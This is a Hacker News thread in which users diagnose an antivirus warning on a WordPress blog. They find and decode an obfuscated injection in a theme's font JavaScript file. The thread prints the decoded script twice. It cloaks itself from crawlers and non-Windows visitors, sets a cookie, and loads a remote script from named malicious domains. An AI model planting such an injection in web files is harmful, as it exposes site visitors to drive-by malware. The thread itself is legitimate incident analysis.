Hacker News new | past | comments | ask | show | jobs | submit login

From AVG:

wp_content/themes/LightBright/js/League_Gothic_400.font.js

Exploit link to exploit site

edit: FF 3.6.8 on Windows - AVG 9




browser? os? someone said this on twitter to ericries after he retweeted another article of mine. I looked this weekend/had others ask if they got a warning. Everyone said it was fine. Looking at the .js file now (its some cufon thing) and the source of the post as well. It's part of what im using with elegantthemes.

Update: http://pastebin.com/UNijfWPu is everything contained in the file mentioned (League_Gothic_400.font.js)


There is an exploit in the first line.

document.write(unescape(...giberrish...))

That writes a script tag into the document with the following payload:

var dc = document.cookie; var cname = 'watchtime'; var wn = window.navigator.userAgent; var stri = /(yahoo|search|msnbot|yandex|googlebot|bing|ask)/i; var strOS = navigator.appVersion; if(dc.indexOf(cname)==-1 && !wn.toLowerCase().match(stri) && strOS.toLowerCase().indexOf('win') != -1) { var doms = ['edisonsnightclub.com','emapis.org','ideacoreportal.com','karenegren.com']; var preffs = ['aqua.','azure.','black.','blue.','brown.','gold.','gray.','green.','lime.','navy.','olive.','plum.','red.','snow.','white.','yellow.']; var dom = Math.floor(Math.random()doms.length); var pref = Math.floor(Math.random()preffs.length); dt=new Date();dt.setTime(dt.getTime() + 736003600);document.cookie=cname+'='+escape(cname)+';expires='+dt.toGMTString()+';path=/'; document.write('<script type="text/javascript" src="http://+preffs[pref]+doms[dom]+/data/mootools.js><\/...); };

I'm thinking that this is malicious (a cursory search for emapis.org shows it to be a malware site)

I'm not super familiar with cufon but this does not appear to be kosher.

Here is a link that may prove useful http://blog.unmaskparasites.com/2010/06/14/attack-on-wordpre...


Here is the unescaped version of what it is doing:

<script>var dc = document.cookie; var cname = 'watchtime'; var wn = window.navigator.userAgent; var stri = /(yahoo|search|msnbot|yandex|googlebot|bing|ask)/i; var strOS = navigator.appVersion; if(dc.indexOf(cname)==-1 && !wn.toLowerCase().match(stri) && strOS.toLowerCase().indexOf('win') != -1) { var doms = ['edisonsnightclub.com','emapis.org','ideacoreportal.com','karenegren.com']; var preffs = ['aqua.','azure.','black.','blue.','brown.','gold.','gray.','green.','lime.','navy.','olive.','plum.','red.','snow.','white.','yellow.']; var dom = Math.floor(Math.random()doms.length); var pref = Math.floor(Math.random()preffs.length); dt=new Date();dt.setTime(dt.getTime() + 736003600);document.cookie=cname+'='+escape(cname)+';expires='+dt.toGMTString()+';path=/'; document.write('<script type="text/javascript" src="http://+preffs[pref]+doms[dom]+/data/mootools.js><\/...); };</script>


I bet it is emapis. org, see:

http://www.urlvoid.com/scan/emapis.org

As the unescaped javascript shows, it's a random chance for different sites, so it might be somewhat hard to reproduce. So far I haven't been able to pull a mootools.js from those sites to see it.

Edit: the js I'm getting back is just (function(){var error = 404;})();

Also, with regards to your site, here is the google safebrowse: http://www.google.com/safebrowsing/diagnostic?site=jasonlbap...

It shows that you also had stuff going to smartenergymodel[.]com, which is also listed on that unmaskparasites link that everyone is passing around.


yeah, dealt with the smartenergymodel thing. Google hasn't updated that yet. this seems to be related to a lot of Mediatemple happenings.


Is that link off the server directly or via a webserver?

edit:Searching for 'emapis.org' (from jacquesm's comment) gets me http://blog.unmaskparasites.com/2010/06/14/attack-on-wordpre... in Google. It's old, but I suspect something similar at work.


webserver directly. let me see if elegantthemes has updated it. im trying to get rid of the junk that when unescaped has the problem.


Virus warning specifically suggests the Cufon font file contains a link to a compromised site.




Guidelines | FAQ | Lists | API | Security | Legal | Apply to YC | Contact

Search: